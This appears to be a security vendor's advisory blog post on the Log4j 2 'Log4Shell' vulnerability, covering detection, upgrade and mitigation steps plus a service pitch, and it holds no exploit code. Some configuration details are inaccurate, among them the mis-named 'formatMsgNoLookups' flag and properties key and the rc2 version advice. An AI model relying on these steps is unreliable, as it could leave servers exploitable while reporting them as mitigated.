Over the past few days, the Log4j vulnerability has made significant headlines across the cybersecurity industry and mainstream media.
• What is Log4j 2?
• Are you impacted by this vulnerability?
• Remediation
• Proactive Response to Zero-Day Vulnerabilities and cyber-attacks
What is Log4j 2?
Log4j 2 is an open-source Apache framework that is a commonly used component for logging requests within Java applications. This library is embedded in many internet services and applications, including Twitter, Amazon, Microsoft, Google and more. This vulnerability, also dubbed Log4Shell or LogJam, allows an attacker to remotely execute code without authentication by submitting a single string of text which can potentially trigger the vulnerability.
There are numerous proven methods through which an attacker can exploit Log4j, some of which have the ability to bypass previous mitigations. As a result, a multi-layered security approach is recommended to provide a more robust defence. The latest variations on the exploit utilise new ways of delivering the malware via HTTP and HTTPS, and make detection harder through obfuscating the Java Naming and Directory Interface (JDNI) string itself.
This is assessed as a critical vulnerability, with a CVSSv3 score of 10.0; as Log4j usage is widespread, the vulnerability is easy to exploit, and if successfully exploited allows for full control of the compromised host. This vulnerability continues to be actively exploited in the wild, with the majority of attempts happening via automated activity.
Are you impacted by this vulnerability?
There is an ever-growing list of impacted manufacturers and components. Click here to see the list and check if your vendors or the products you use are affected.
Our Security Operations Team has put together steps to identify if you have been impacted by Log4j vulnerability.
To test whether an application is vulnerable locally, follow the instructions in this link under the Reproducing Locally section.
Our security partners at CrowdStrike and Microsoft have developed methods for detecting hosts that may utilise the Log4j library. If you utilise Microsoft 365 Defender or CrowdStrike Falcon, follow the below steps to check for affected hosts:
CrowdStrike Falcon: Navigate to Host Search under the Investigate section, hover above Vulnerabilities section in the top panel to display Log4Shell Vulnerability Dashboard > Audit of Log4j occurrences by host.
Microsoft 365 Defender: Navigate to Threat Analytics section and locate the CVE-2021-44228 Log4j Active Exploitation > Impacted Assets.
If any hosts or devices utilise the Log4j 2 library but do not forward logs to a centralised SIEM (Security Incident and Event Management) or do not have an EDR (Endpoint Detection and Response) agent installed on potentially affected hosts, you are missing critical visibility over your endpoints and services. Loop Secure is actively monitoring our clients for signs of compromise via this vulnerability.
Remediation
If you have the resources or an IT security team that is able to remediate this vulnerability, you should upgrade affected products to Log4j 2 version 2.15.0-rc2 immediately. The previous fix in Log4j version 2.15.0-rc1 can be bypassed and should be considered vulnerable.
If upgrading is not possible, implement the following mitigations:
Versions 2.10 and above:
- Add -formatMsgNoLookups=true as a command line option or add log4j.formatMsgNoLookups=true to the log4j2.component.properties file on the classpath to prevent lookups in log event messages.
Versions 2.7 and above:
- Specify %m{nolookups} in the Pattern Layout configuration to prevent lookups in log event messages.
Additional remediation suggestions:
- Ensure Java is up to date on all versions.
- Consider blocking LDAP and RMI outbound traffic to the internet from vulnerable servers.
- Deploy multi-layered defence in depth; use defences such as WAF (Web Application Firewall) and IPS (Intrusion Protection System) to catch and filter out as many malicious attempts as possible in addition to SIEM & EDR.
Please note that this vulnerability has been identified as affecting a wide variety of software including SAAS (Software as a Service) solutions and global platforms on which other services rely. Organisations should closely monitor all external assets until confirmation they are not vulnerable has been made. In some cases, vendors will need to implement updates and mitigations to secure products and services.
Proactive Response to Zero-Day Vulnerabilities and cyber-attacks.
To proactively secure organisations across multiple industries, Loop Secure provides Australian businesses 24/7 protection, monitoring and detection of threats to their entire environment through our Managed, Detection and Response service. As an extension of your security team, our world-class Security Operations Centre delivers ongoing incident response and continuous monitoring of IT assets.
Our SOC team is ready every minute of the day to hunt through and analyse the behaviours that your IT assets are exhibiting. Their goal is to identify, contain and eradicate the threat to your environment. It is going beyond identifying affected IT services for your business, it is ensuring your most important assets are always secured and protected.
For further information, please use the resources we’ve compiled below:
MITRE: CVE-2021-44228
CrowdStrike: Log4j2 Vulnerability “Log4Shell” (CVE-2021-44228)
Threatpost: New variations and evidence of earlier activity
